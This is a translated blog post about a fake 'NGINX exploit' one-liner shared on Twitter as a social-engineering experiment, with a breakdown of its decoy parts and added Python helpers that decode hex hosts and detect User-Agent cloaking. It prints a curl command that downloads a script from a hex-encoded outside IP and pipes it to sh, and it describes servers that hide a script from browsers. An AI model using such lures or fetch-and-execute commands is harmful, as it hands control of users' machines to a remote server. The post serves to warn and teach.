Translator's note:
TL;DR: Never pipe anything into sh or bash, under any circumstances. It is a great way to lose control of your computer.
I want to share with you a short story about an amusing use of a PoC that was created on May 31. It appeared immediately, as a reaction to news from
After I had finished playing with the new exploitation trick in curl, I quoted the original tweet and "leaked a working PoC" consisting of a single line of code that supposedly exploited the discovered vulnerability. Of course, this was nonsense. I assumed I would be exposed immediately and that, at best, I would get a couple of retweets (oh well).
However, I could not have imagined what happened next. The popularity of my tweet grew. Surprisingly, at the moment (15:00 Moscow time, June 1) only a few people have realised that this is a fake. Many people retweet it without checking it at all (let alone admiring the beautiful ASCII art it produces).
Just look how beautiful it is!
While all those loops and colours are nice, it is obvious that people had to run the code on their machines to see them. Fortunately, researchers behave the same way, and since I do not want to get into legal trouble, the code buried on my site only makes echo calls without trying to install or execute any additional code.
A small digression:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Socio-electronic engineering (SEE) - more than just phishing
Trust and familiarity were meant to be a major part of this experiment. I think they are what led to its success. The command line visibly signals safety by referring to "127.0.0.1" (the well-known localhost). Localhost is considered trusted, and data sent to it never leaves your computer.
Familiarity is the second key SEE component of the experiment. Since the target audience consisted mostly of people familiar with the basics of computer security, it was important to craft the code so that its parts looked recognisable and familiar (and therefore safe). Borrowing elements of old exploitation techniques and combining them in an unusual way proved very successful.
Below is a full breakdown of the one-liner. Everything in this list is purely cosmetic; in fact none of it is needed for it to actually work.
Which elements are actually needed? Only -gsS, -O 0x0238f06a, |sh and the web server itself. The web server does not contain any malicious commands; it simply draws ASCII art using echo commands in a script contained in index.html. When the user enters the line with |sh in the middle, index.html is downloaded and executed. Fortunately, the web server's administrators had no malicious intent.
- ../../../%00 - represents a directory traversal;
- ngx_stream_module.so - the path to an arbitrary NGINX module;
- /bin/sh%00<'protocol:TCP' - we supposedly launch /bin/sh on the target machine and redirect its output to a TCP port;
- -O 0x0238f06a#PLToffset - the secret ingredient; the #PLToffset suffix is there to make it look like a memory address somehow contained in the PLT;
- |sh; - another essential piece. We need to pipe the output into sh/bash to execute the code coming from the attacking web server 0x0238f06a (2.56.240.x);
- nc /dev/tcp/localhost - a dummy in which netcat points at /dev/tcp/localhost so that everything looks safe again. In fact it does nothing and is included in the line just for looks.
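The hex "host" is the piece that does the real work in both the "what is actually needed" paragraph and the breakdown above, so here is an added analysis helper (not code from the post or its server): it normalises numeric IPv4 literals the way glibc's inet_aton does, which is how curl on Linux ends up resolving a token like 0x0238f06a, and pulls every such target out of a command line. The function names are my own; the one-liner is reproduced from the page for analysis only.

```python
from urllib.parse import urlsplit

def parse_part(part):
    """One dot-separated component: 0x.. is hex, a leading 0 is octal, else decimal."""
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)

def numeric_host_to_dotted(host):
    """Normalise a numeric IPv4 literal as glibc inet_aton does: 1 to 4 parts,
    the last part filling the remaining bytes ('0x0238f06a' and '127.1' are
    both valid). Returns dotted-quad text, or None if the host is not numeric."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [parse_part(p) for p in parts]
    except ValueError:
        return None
    widths = [8] * (len(parts) - 1) + [32 - 8 * (len(parts) - 1)]
    addr = 0
    for value, width in zip(values, widths):
        if not 0 <= value < 1 << width:
            return None
        addr = (addr << width) | value
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))

def decode_curl_targets(cmdline):
    """Map every non-flag argument that curl would treat as a numeric host
    (scheme, port, path and #fragment are stripped first) to its dotted form."""
    targets = {}
    for token in cmdline.split():
        if token.startswith("-"):
            continue
        url = token if "://" in token else "http://" + token
        try:
            host = urlsplit(url).hostname
        except ValueError:
            continue
        dotted = numeric_host_to_dotted(host) if host else None
        if dotted:
            targets[token] = dotted
    return targets

# The page's one-liner, reproduced here only as input for the analysis above.
ONE_LINER = ("curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler"
             "?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP'"
             " -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost")
```

Running decode_curl_targets(ONE_LINER) reports only the 0x0238f06a#PLToffset token: the decoy "127.0.0.1-OR-VICTIM-SERVER" is not a numeric host at all, while the hex word resolves to a real 2.56.240.x address.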
This concludes the breakdown of the one-liner and the discussion of the "socio-electronic engineering" (sophisticated phishing) aspects.
Web server configuration and countermeasures
Since most of my subscribers are infosec people / hackers, I decided to make the web server somewhat more resistant to "curious" probing on their part, just so the guys have something to do (and it would be a fun setup). I will not list all the traps here, since the experiment is still ongoing, but here are some of the things the server does:
- It closely monitors attempts to share it on certain social networks and substitutes various previews to encourage the user to click the link.
- It redirects Chrome/Mozilla/Safari/etc. to the Thugcrowd promo video instead of showing the shell script.
- It watches for BIG indicators of intrusion/hacking, then starts forwarding the requests to an NSA server (ha!).
- It installs a Trojan, and a BIOS rootkit too, on every computer whose user visits the host from a regular browser (just kidding!).
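The browser-redirect behaviour above is exactly why a URL should be inspected under more than one User-Agent before anything is piped into a shell. As an added example (not code from the post or from the author's Apache setup), this builds a constructed stand-in server that answers curl-like clients with a script and browsers with a redirect, then runs the check a recipient of such a one-liner can run: fetch the same URL as curl and as a browser and report whether the two views differ. The script body, redirect URL and all names are placeholders of my own.

```python
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the experiment's server: a shell script for
# curl-like clients, a redirect elsewhere for anything that looks like a browser.
SCRIPT_BODY = b'echo "ASCII art would be printed here"\n'
BROWSER_LOCATION = "https://example.invalid/promo-video"  # placeholder URL

class CloakingHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if "Mozilla" in self.headers.get("User-Agent", ""):
            self.send_response(302)
            self.send_header("Location", BROWSER_LOCATION)
            self.end_headers()
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(SCRIPT_BODY)

    def log_message(self, *args):  # keep the demo quiet
        pass

def start_server():
    """Serve on a random loopback port in a background thread."""
    server = HTTPServer(("127.0.0.1", 0), CloakingHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server

class NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, *args, **kwargs):
        return None  # surface a 3xx as an error instead of following it

def fetch(url, user_agent):
    """Return (status, Location header, body) exactly as served to this UA."""
    request = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with urllib.request.build_opener(NoRedirect).open(request) as resp:
            return resp.status, resp.headers.get("Location"), resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Location"), err.read()

def check_cloaking(url):
    """Fetch once with a curl-style User-Agent and once as a browser; a
    difference means you cannot judge the script by what a browser shows."""
    curl_view = fetch(url, "curl/8.0.0")
    browser_view = fetch(url, "Mozilla/5.0 (X11; Linux x86_64)")
    cloaked = curl_view[0] != browser_view[0] or curl_view[2] != browser_view[2]
    return {"cloaked": cloaked, "curl": curl_view, "browser": browser_view}
```

Call start_server(), then check_cloaking("http://127.0.0.1:%d/index.html" % server.server_port); the curl view returns the script with status 200 while the browser view gets the 302, so the result is flagged as cloaked.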
A short aside
In this case my only goal was to master some Apache features, specifically the fine-grained rules for redirecting requests, and I thought: why not?
NGINX Exploit (Real!)
Subscribe to
source: www.habr.com